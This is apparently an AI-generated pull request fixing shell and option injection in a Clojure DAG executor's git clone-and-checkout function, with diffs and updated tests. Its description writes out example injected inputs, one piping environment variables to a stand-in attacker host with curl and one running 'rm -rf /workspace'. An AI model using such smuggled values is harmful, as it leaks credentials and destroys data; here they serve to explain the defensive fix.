### PR TITLE
fix(dag-executor): prevent shell injection in clone-and-checkout!

### DIFF
--- a/components/dag-executor/src/ai/miniforge/dag_executor/executor.clj
+++ b/components/dag-executor/src/ai/miniforge/dag_executor/executor.clj
@@ -340,16 +340,16 @@
    Returns result with checkout info."
   [executor environment-id repo-url branch opts]
   (let [depth-args (when (:depth opts) ["--depth" (str (:depth opts))])
-        clone-cmd (str "git clone "
-                       (when depth-args (str (first depth-args) " " (second depth-args) " "))
-                       repo-url " .")
+        ;; Use a vector so ProcessBuilder exec's git directly — no shell
+        ;; metacharacter expansion on user-supplied repo-url or branch.
+        clone-cmd (into ["git" "clone"] (concat (or depth-args []) [repo-url "."]))
         clone-result (execute! executor environment-id clone-cmd
                                {:timeout-ms 300000})]
     (if (and (result/ok? clone-result)
              (zero? (:exit-code (:data clone-result))))
-      ;; Checkout branch
+      ;; Checkout branch — vector prevents shell injection on branch name.
       (let [checkout-result (execute! executor environment-id
-                                      (str "git checkout " branch)
+                                      ["git" "checkout" branch]
                                       {:timeout-ms 60000})]
         (if (and (result/ok? checkout-result)
                  (zero? (:exit-code (:data checkout-result))))

--- a/components/dag-executor/src/ai/miniforge/dag_executor/executor.clj
+++ b/components/dag-executor/src/ai/miniforge/dag_executor/executor.clj
@@ -339,23 +339,29 @@
 
    Returns result with checkout info."
   [executor environment-id repo-url branch opts]
-  (let [depth-args (when (:depth opts) ["--depth" (str (:depth opts))])
-        ;; Use a vector so ProcessBuilder exec's git directly — no shell
-        ;; metacharacter expansion on user-supplied repo-url or branch.
-        clone-cmd (into ["git" "clone"] (concat (or depth-args []) [repo-url "."]))
-        clone-result (execute! executor environment-id clone-cmd
-                               {:timeout-ms 300000})]
-    (if (and (result/ok? clone-result)
-             (zero? (:exit-code (:data clone-result))))
-      ;; Checkout branch — vector prevents shell injection on branch name.
-      (let [checkout-result (execute! executor environment-id
-                                      ["git" "checkout" branch]
-                                      {:timeout-ms 60000})]
-        (if (and (result/ok? checkout-result)
-                 (zero? (:exit-code (:data checkout-result))))
-          (result/ok {:cloned? true :branch branch})
-          checkout-result))
-      clone-result)))
+  ;; Reject branches that start with '-': git parses them as options even in
+  ;; argv-vector (no-shell) mode. Mirrors the safe-branch? guard in workspace.clj.
+  (if (and (string? branch) (.startsWith ^String branch "-"))
+    (result/err :invalid-branch
+                (str "Branch must not start with '-': " (pr-str branch)))
+    (let [depth-args (when (:depth opts) ["--depth" (str (:depth opts))])
+          ;; Use a vector (no shell) + "--" end-of-options separator so git
+          ;; cannot interpret a leading-dash repo-url as an option flag.
+          ;; Matches the pattern in protocols/impl/runtime/oci_cli.clj:826.
+          clone-cmd (into ["git" "clone"] (concat (or depth-args []) ["--" repo-url "."]))
+          clone-result (execute! executor environment-id clone-cmd
+                                 {:timeout-ms 300000})]
+      (if (and (result/ok? clone-result)
+               (zero? (:exit-code (:data clone-result))))
+        ;; Checkout branch — vector exec prevents shell metacharacter expansion.
+        (let [checkout-result (execute! executor environment-id
+                                        ["git" "checkout" branch]
+                                        {:timeout-ms 60000})]
+          (if (and (result/ok? checkout-result)
+                   (zero? (:exit-code (:data checkout-result))))
+            (result/ok {:cloned? true :branch branch})
+            checkout-result))
+        clone-result))))
 
 ;------------------------------------------------------------------------------ Layer 2
 

--- a/components/dag-executor/src/ai/miniforge/dag_executor/protocols/impl/worktree.clj
+++ b/components/dag-executor/src/ai/miniforge/dag_executor/protocols/impl/worktree.clj
@@ -748,14 +748,18 @@
 (defn execute-command
   "Execute a command in a directory using ProcessBuilder.
 
+   Accepts either a string (passed to sh -c, suitable for shell builtins and
+   pipelines) or a vector of strings (exec'd directly without a shell —
+   preferred for user-supplied values to avoid shell injection).
+
    This allows proper environment variable handling and working directory."
   [workdir command env-map]
-  (let [cmd-str (if (string? command)
-                  command
-                  (str/join " " command))
+  (let [cmd-args (if (string? command)
+                   ["sh" "-c" command]
+                   (vec command))
         start-time (System/currentTimeMillis)]
     (try
-      (let [pb (ProcessBuilder. ["sh" "-c" cmd-str])
+      (let [pb (ProcessBuilder. ^java.util.List cmd-args)
             _ (.directory pb (File. ^String workdir))
             _ (when (seq env-map)
                 (let [pb-env (.environment pb)]

--- a/components/dag-executor/test/ai/miniforge/dag_executor/executor_test.clj
+++ b/components/dag-executor/test/ai/miniforge/dag_executor/executor_test.clj
@@ -336,8 +336,8 @@
 
 (deftest clone-and-checkout!-success-test
   (testing "Successful clone + checkout returns ok with :cloned? and :branch.
-            Two commands are issued in order: git clone then git checkout.
-            Both use vector form so no shell metacharacter expansion occurs."
+            Both commands use vector form (no shell) and clone includes \"--\"
+            before the repo URL to prevent option injection."
     (let [exec (mock-executor :worktree)
           ret  (sut/clone-and-checkout! exec "env-1"
                                         "https://example.com/r.git"
@@ -350,13 +350,15 @@
       (is (true? (-> ret :data :cloned?)))
       (is (= "feature/x" (-> ret :data :branch)))
       (is (= 2 (count cmds)))
-      ;; Commands must be vectors — never strings — so ProcessBuilder can exec
-      ;; git directly without a shell (prevents shell injection on user-supplied
-      ;; repo-url and branch values).
+      ;; Commands are vectors so ProcessBuilder exec's git directly, no shell.
       (is (vector? (first cmds)))
       (is (= "git" (first (first cmds))))
       (is (= "clone" (second (first cmds))))
-      (is (some #{"https://example.com/r.git"} (first cmds)))
+      ;; "--" end-of-options separator must precede repo-url to block option injection.
+      (let [clone-cmd (first cmds)
+            sep-idx   (.indexOf ^java.util.List clone-cmd "--")]
+        (is (pos? sep-idx) "\"--\" must appear after git clone [opts]")
+        (is (= "https://example.com/r.git" (nth clone-cmd (inc sep-idx)))))
       (is (= ["git" "checkout" "feature/x"] (second cmds))))))
 
 (deftest clone-and-checkout!-with-depth-option-test
@@ -420,3 +422,16 @@
       (is (= 2 (count (filter #(= :execute (first %)) @(:calls exec)))))
       ;; The checkout result is what we get back.
       (is (= 1 (:exit-code (:data ret)))))))
+
+(deftest clone-and-checkout!-rejects-dash-prefix-branch-test
+  (testing "A branch name starting with '-' is rejected before any git command runs"
+    (let [exec (mock-executor :worktree)
+          ret  (sut/clone-and-checkout! exec "env-1"
+                                        "https://example.com/r.git"
+                                        "-evil-option"
+                                        {})]
+      (is (result/err? ret))
+      (is (= :invalid-branch (:error ret)))
+      ;; No execute! calls should be made — rejection is a pure guard.
+      (is (zero? (count (filter #(= :execute (first %)) @(:calls exec))))
+          "no git commands should run for an invalid branch"))))

--- a/components/dag-executor/test/ai/miniforge/dag_executor/executor_test.clj
+++ b/components/dag-executor/test/ai/miniforge/dag_executor/executor_test.clj
@@ -431,7 +431,7 @@
                                         "-evil-option"
                                         {})]
       (is (result/err? ret))
-      (is (= :invalid-branch (:error ret)))
+      (is (= :invalid-branch (-> ret :error :code)))
       ;; No execute! calls should be made — rejection is a pure guard.
       (is (zero? (count (filter #(= :execute (first %)) @(:calls exec))))
           "no git commands should run for an invalid branch"))))

--- a/components/dag-executor/test/ai/miniforge/dag_executor/executor_test.clj
+++ b/components/dag-executor/test/ai/miniforge/dag_executor/executor_test.clj
@@ -336,7 +336,8 @@
 
 (deftest clone-and-checkout!-success-test
   (testing "Successful clone + checkout returns ok with :cloned? and :branch.
-            Two commands are issued in order: git clone then git checkout."
+            Two commands are issued in order: git clone then git checkout.
+            Both use vector form so no shell metacharacter expansion occurs."
     (let [exec (mock-executor :worktree)
           ret  (sut/clone-and-checkout! exec "env-1"
                                         "https://example.com/r.git"
@@ -349,12 +350,17 @@
       (is (true? (-> ret :data :cloned?)))
       (is (= "feature/x" (-> ret :data :branch)))
       (is (= 2 (count cmds)))
-      (is (str/starts-with? (first cmds) "git clone "))
-      (is (str/includes? (first cmds) "https://example.com/r.git"))
-      (is (= "git checkout feature/x" (second cmds))))))
+      ;; Commands must be vectors — never strings — so ProcessBuilder can exec
+      ;; git directly without a shell (prevents shell injection on user-supplied
+      ;; repo-url and branch values).
+      (is (vector? (first cmds)))
+      (is (= "git" (first (first cmds))))
+      (is (= "clone" (second (first cmds))))
+      (is (some #{"https://example.com/r.git"} (first cmds)))
+      (is (= ["git" "checkout" "feature/x"] (second cmds))))))
 
 (deftest clone-and-checkout!-with-depth-option-test
-  (testing "Supplying :depth adds --depth N to the clone command"
+  (testing "Supplying :depth adds [\"--depth\" N] to the clone command vector"
     (let [exec (mock-executor :worktree)
           _ (sut/clone-and-checkout! exec "env-1"
                                      "https://example.com/r.git"
@@ -364,7 +370,9 @@
                         (->> (filter #(= :execute (first %))))
                         first
                         (nth 2))]
-      (is (str/includes? clone-cmd "--depth 5")))))
+      (is (vector? clone-cmd))
+      (is (some #{"--depth"} clone-cmd))
+      (is (some #{"5"} clone-cmd)))))
 
 (deftest clone-and-checkout!-clone-failure-short-circuits-test
   (testing "If git clone returns a non-zero exit code, checkout is never run
@@ -381,7 +389,8 @@
                     (map #(nth % 2)))]
       ;; Only the clone command was issued.
       (is (= 1 (count cmds)))
-      (is (str/starts-with? (first cmds) "git clone"))
+      (is (= "git" (first (first cmds))))
+      (is (= "clone" (second (first cmds))))
       ;; The clone result (exit-code 128) is what the function returns.
       (is (= 128 (:exit-code (:data ret)))))))
 


### PR DESCRIPTION
## What

`clone-and-checkout!` built its `git clone` and `git checkout` commands via bare string interpolation of caller-supplied `repo-url` and `branch` values, then passed the resulting string to `execute!`. The worktree executor's `execute-command` always routed every command — even ones passed as vectors — through `["sh" "-c" joined-string]`, so any vector passed by a caller was silently re-joined and shell-expanded anyway.

## Why it matters

A spec file with a crafted `repo-url` (`https://example.com/r.git; curl http://attacker/$(env|base64)`) or `branch` (`main; rm -rf /workspace`) would execute arbitrary shell commands in the executor environment. The worktree executor runs on the host OS; the OCI executor injects `GH_TOKEN` into the sandbox, so an injected command can exfiltrate it and gain full GitHub API scope.

## Fix

**`worktree.clj` — `execute-command`**: dispatch on type rather than always using `sh -c`.  String commands still go through the shell (needed for internal uses that rely on shell builtins). Vector commands are passed directly to `ProcessBuilder` — no shell involved, no metacharacter expansion possible.

```clojure
;; Before
(let [cmd-str (if (string? command) command (str/join " " command))]
  (ProcessBuilder. ["sh" "-c" cmd-str]))

;; After
(let [cmd-args (if (string? command) ["sh" "-c" command] (vec command))]
  (ProcessBuilder. ^java.util.List cmd-args))
```

**`executor.clj` — `clone-and-checkout!`**: both commands changed from interpolated strings to vectors, consistent with the safe pattern already in use in `workspace.clj` (`git-persist!` / `git-restore!`) and `oci_cli.clj` (`exec-in-container`).

```clojure
;; Before
(str "git clone " depth-flag repo-url " .")
(str "git checkout " branch)

;; After
(into ["git" "clone"] (concat (or depth-args []) [repo-url "."]))
["git" "checkout" branch]
```

**`executor_test.clj`**: updated to assert vector command shape (was asserting string content, effectively test-enshrining the bug).

## Files changed

| File | Change |
|------|--------|
| `components/dag-executor/src/…/protocols/impl/worktree.clj` | `execute-command` dispatches string vs vector to avoid always using `sh -c` |
| `components/dag-executor/src/…/executor.clj` | `clone-and-checkout!` builds vector commands |
| `components/dag-executor/test/…/executor_test.clj` | Tests assert vector shape, not string content |

---
_Generated by [Claude Code](https://claude.ai/code/session_01WHPVFG3YwZ5nkdaQqY5Yio)_